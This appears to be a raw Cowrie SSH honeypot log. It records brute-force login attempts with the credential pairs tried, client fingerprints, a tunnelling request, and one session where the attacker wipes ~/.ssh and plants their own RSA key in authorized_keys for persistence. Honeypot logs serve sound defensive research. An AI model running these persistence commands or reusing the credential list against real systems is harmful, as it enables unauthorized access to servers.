{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:30:40.324407Z","src_ip":"185.152.45.241","session":"6bc43ff1d9de"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11758,"dst_ip":"1.2.3.4","dst_port":22,"session":"803707f8dbc1","protocol":"ssh","message":"New connection: 185.152.45.241:11758 (1.2.3.4:22) [session: 803707f8dbc1]","sensor":"my-vps","timestamp":"2025-09-09T02:30:40.369178Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:30:40.370216Z","src_ip":"185.152.45.241","session":"803707f8dbc1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:30:40.418762Z","src_ip":"185.152.45.241","session":"803707f8dbc1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:30:40.659752Z","src_ip":"185.152.45.241","session":"803707f8dbc1"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:30:41.195516Z","src_ip":"212.227.235.229","session":"d3fb81a100e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49798,"dst_ip":"1.2.3.4","dst_port":22,"session":"01859863599e","protocol":"ssh","message":"New connection: 212.227.235.229:49798 (1.2.3.4:22) [session: 01859863599e]","sensor":"my-vps","timestamp":"2025-09-09T02:30:41.541033Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:30:41.541833Z","src_ip":"212.227.235.229","session":"01859863599e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:30:41.709715Z","src_ip":"185.152.45.241","session":"803707f8dbc1"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11769,"dst_ip":"1.2.3.4","dst_port":22,"session":"71a571443387","protocol":"ssh","message":"New connection: 185.152.45.241:11769 (1.2.3.4:22) [session: 71a571443387]","sensor":"my-vps","timestamp":"2025-09-09T02:30:41.754324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:30:41.755054Z","src_ip":"185.152.45.241","session":"71a571443387"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:30:41.803884Z","src_ip":"185.152.45.241","session":"71a571443387"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:30:41.841910Z","src_ip":"212.227.235.229","session":"01859863599e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:30:42.024655Z","src_ip":"185.152.45.241","session":"71a571443387"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:30:42.069988Z","src_ip":"185.152.45.241","session":"6bc43ff1d9de"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:30:42.071182Z","src_ip":"185.152.45.241","session":"71a571443387"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:30:43.078627Z","src_ip":"212.227.235.229","session":"01859863599e"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:30:43.380181Z","src_ip":"212.227.235.229","session":"36163d1c4f9d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:30:43.381131Z","src_ip":"212.227.235.229","session":"01859863599e"}
{"eventid":"cowrie.session.closed","duration":31.361234188079834,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:30:50.489363Z","src_ip":"212.227.235.229","session":"7a1f334578c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":28107,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ac2c6ec4ecf","protocol":"ssh","message":"New connection: 212.227.125.160:28107 (1.2.3.4:22) [session: 8ac2c6ec4ecf]","sensor":"my-vps","timestamp":"2025-09-09T02:30:53.252013Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:30:53.253185Z","src_ip":"212.227.125.160","session":"8ac2c6ec4ecf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":28357,"dst_ip":"1.2.3.4","dst_port":22,"session":"78258ba48bfd","protocol":"ssh","message":"New connection: 212.227.125.160:28357 (1.2.3.4:22) [session: 78258ba48bfd]","sensor":"my-vps","timestamp":"2025-09-09T02:30:53.365207Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:30:53.368454Z","src_ip":"212.227.125.160","session":"78258ba48bfd"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T02:30:53.479834Z","src_ip":"212.227.125.160","session":"78258ba48bfd"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:30:53.937594Z","src_ip":"212.227.125.160","session":"78258ba48bfd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T02:30:54.052942Z","session":"78258ba48bfd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33404,"dst_ip":"1.2.3.4","dst_port":22,"session":"55c7a5103156","protocol":"ssh","message":"New connection: 212.227.235.229:33404 (1.2.3.4:22) [session: 55c7a5103156]","sensor":"my-vps","timestamp":"2025-09-09T02:31:11.402003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:31:11.403603Z","src_ip":"212.227.235.229","session":"55c7a5103156"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:31:11.672472Z","src_ip":"212.227.235.229","session":"55c7a5103156"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T02:31:12.728767Z","src_ip":"212.227.235.229","session":"55c7a5103156"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:31:13.991763Z","src_ip":"212.227.235.229","session":"55c7a5103156"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59382,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3f9db1a0c05","protocol":"ssh","message":"New connection: 212.227.235.229:59382 (1.2.3.4:22) [session: b3f9db1a0c05]","sensor":"my-vps","timestamp":"2025-09-09T02:31:23.802007Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:31:23.810351Z","src_ip":"212.227.235.229","session":"b3f9db1a0c05"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:31:24.188149Z","src_ip":"212.227.235.229","session":"b3f9db1a0c05"}
{"eventid":"cowrie.login.failed","username":"minerstat","password":"Password1","message":"login attempt [minerstat/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T02:31:25.712466Z","src_ip":"212.227.235.229","session":"b3f9db1a0c05"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:31:27.093555Z","src_ip":"212.227.235.229","session":"b3f9db1a0c05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44098,"dst_ip":"1.2.3.4","dst_port":22,"session":"81baa6d33099","protocol":"ssh","message":"New connection: 212.227.235.229:44098 (1.2.3.4:22) [session: 81baa6d33099]","sensor":"my-vps","timestamp":"2025-09-09T02:31:40.174071Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:31:40.175021Z","src_ip":"212.227.235.229","session":"81baa6d33099"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:31:40.483416Z","src_ip":"212.227.235.229","session":"81baa6d33099"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"appuser1234","message":"login attempt [appuser/appuser1234] failed","sensor":"my-vps","timestamp":"2025-09-09T02:31:41.750255Z","src_ip":"212.227.235.229","session":"81baa6d33099"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:31:43.060308Z","src_ip":"212.227.235.229","session":"81baa6d33099"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11770,"dst_ip":"1.2.3.4","dst_port":22,"session":"f873ff646d70","protocol":"ssh","message":"New connection: 185.152.45.241:11770 (1.2.3.4:22) [session: f873ff646d70]","sensor":"my-vps","timestamp":"2025-09-09T02:31:53.519969Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:31:53.524343Z","src_ip":"185.152.45.241","session":"f873ff646d70"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:31:53.579253Z","src_ip":"185.152.45.241","session":"f873ff646d70"}
{"eventid":"cowrie.login.success","username":"root","password":"tarantula1","message":"login attempt [root/tarantula1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:31:53.845677Z","src_ip":"185.152.45.241","session":"f873ff646d70"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:31:54.008502Z","src_ip":"185.152.45.241","session":"f873ff646d70"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:31:54.009204Z","src_ip":"185.152.45.241","session":"f873ff646d70"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:31:54.010384Z","src_ip":"185.152.45.241","session":"f873ff646d70"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:31:54.059461Z","src_ip":"185.152.45.241","session":"f873ff646d70"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:31:54.219144Z","src_ip":"185.152.45.241","session":"f873ff646d70"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:31:54.219965Z","src_ip":"185.152.45.241","session":"f873ff646d70"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:31:54.269565Z","src_ip":"185.152.45.241","session":"f873ff646d70"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:31:54.270386Z","src_ip":"185.152.45.241","session":"f873ff646d70"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11771,"dst_ip":"1.2.3.4","dst_port":22,"session":"8392024886aa","protocol":"ssh","message":"New connection: 185.152.45.241:11771 (1.2.3.4:22) [session: 8392024886aa]","sensor":"my-vps","timestamp":"2025-09-09T02:31:54.314184Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:31:54.314972Z","src_ip":"185.152.45.241","session":"8392024886aa"}
